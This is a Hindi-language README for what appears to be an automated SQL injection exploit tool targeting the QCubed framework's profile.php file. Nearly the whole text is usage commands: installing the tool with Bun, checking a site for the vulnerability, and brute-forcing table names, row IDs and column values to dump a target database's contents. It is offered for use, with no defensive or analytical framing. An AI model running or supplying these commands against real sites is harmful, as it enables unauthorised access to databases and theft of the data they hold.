
QCubed profile.php फ़ाइल के लिए स्वचालित SQL इंजेक्शन
आपको Bun स्थापित होना चाहिए: https://bun.sh
निर्भरताएँ स्थापित करने के लिए:
bun install
चलाने के लिए:
# सहायता दिखाएँ
bun run exploit -h
# भेद्यता की जाँच करें
bun run exploit vulnerable -u https://site.com/framework/assets/_core/php/profile.php
# नए लक्ष्य के लिए एक सत्र बनाएँ
bun run exploit create -n your_session_name -u https://site.com/framework/assets/_core/php/profile.php
# तालिका को brute-force करें
bun run exploit brute-table -n your_session_name -w path/to/wordlist.txt
# मिली तालिकाएँ या तालिका का कॉलम दिखाएँ
bun run exploit show-table -n your_session_name
bun run exploit show-column -n your_session_name -t table_name
# आईडी brute-force करें
bun run exploit brute-id -n your_session_name -t table_name -i 1
# पंक्ति का मान brute-force करें
# वैकल्पिक रूप से -r का उपयोग करें जहाँ यह रुका था वहाँ से brute-forcing फिर से शुरू करने के लिए
bun run exploit brute-column -n your_session_name -t table_name -c column_name -i 1
# तालिका के मिले key-value जोड़े दिखाएँ
# वैकल्पिक रूप से केवल एक विशेष आईडी के लिए दिखाने के लिए `-i id_value`
bun run exploit show-rows -n your_session_name -t table_name